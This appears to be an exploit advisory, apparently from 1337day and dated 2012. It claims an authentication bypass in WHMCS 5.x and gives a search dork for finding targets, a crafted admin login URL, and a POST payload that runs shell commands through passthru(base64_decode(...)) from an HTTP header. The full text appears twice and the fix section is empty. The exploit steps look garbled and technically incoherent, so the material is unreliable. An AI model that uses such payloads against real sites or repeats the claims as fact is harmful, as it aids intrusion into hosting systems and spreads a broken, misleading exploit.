##################################################
# Description : WHMCS 5.x Authentication Bypass Vulnerability
# Author : Agd_Scorp
# Contact:
# Version : 5.x
# Link : http://www.whmcs.com/order-now/
# Date : Monday, December 31, 2012
# Dork : intext:Powered by WHMCompleteSolution
##################################################
Recommended: You must have BEeF or Tamper Data already installed, I do not recommend doing this process manually.
# The Fact:
WHMCS 5.0 is completely vulnerable to this vulenrability, but in 5.1 version, WHMCS has added extra cache-security, so I've added an extra-payload for it, you can do the exploitation-process without the payload in the 5.0 version.
# The Exploitation
http://site.com/whmcs/admin/login.php?correct&cache=1?login=getpost{}
after you have successfully entered that into your browser, the page will lag for abit due to the cache-validation, which we, ofcourse, will change it. ;-)
when the page is loading, quickly open Tamper Data and change the loading POST_SESSION request & the payload to this:
POST: $post(login=1);passthru(base64_decode(\$_SERVER[HTTP_CMD]))&login_cancel;die;";
Payload: $payload = "login=1&title=1&execorder=0&hook=urlencoded&r edir ect={admin_index}";
# The Result
Once you have done this process, you will be automatically be redirected to the admin page, although, if the administrator has enabled cache-security, this process will fail.
# Solution & Fix
# 1337day.com [2013-01-06]
# Description : WHMCS 5.x Authentication Bypass Vulnerability
# Author : Agd_Scorp
# Contact:
# Version : 5.x
# Link : http://www.whmcs.com/order-now/
# Date : Monday, December 31, 2012
# Dork : intext:Powered by WHMCompleteSolution
##################################################
Recommended: You must have BEeF or Tamper Data already installed, I do not recommend doing this process manually.
# The Fact:
WHMCS 5.0 is completely vulnerable to this vulenrability, but in 5.1 version, WHMCS has added extra cache-security, so I've added an extra-payload for it, you can do the exploitation-process without the payload in the 5.0 version.
# The Exploitation
http://site.com/whmcs/admin/login.php?correct&cache=1?login=getpost{}
after you have successfully entered that into your browser, the page will lag for abit due to the cache-validation, which we, ofcourse, will change it. ;-)
when the page is loading, quickly open Tamper Data and change the loading POST_SESSION request & the payload to this:
POST: $post(login=1);passthru(base64_decode(\$_SERVER[HTTP_CMD]))&login_cancel;die;";
Payload: $payload = "login=1&title=1&execorder=0&hook=urlencoded&r edir ect={admin_index}";
# The Result
Once you have done this process, you will be automatically be redirected to the admin page, although, if the administrator has enabled cache-security, this process will fail.
# Solution & Fix
# 1337day.com [2013-01-06]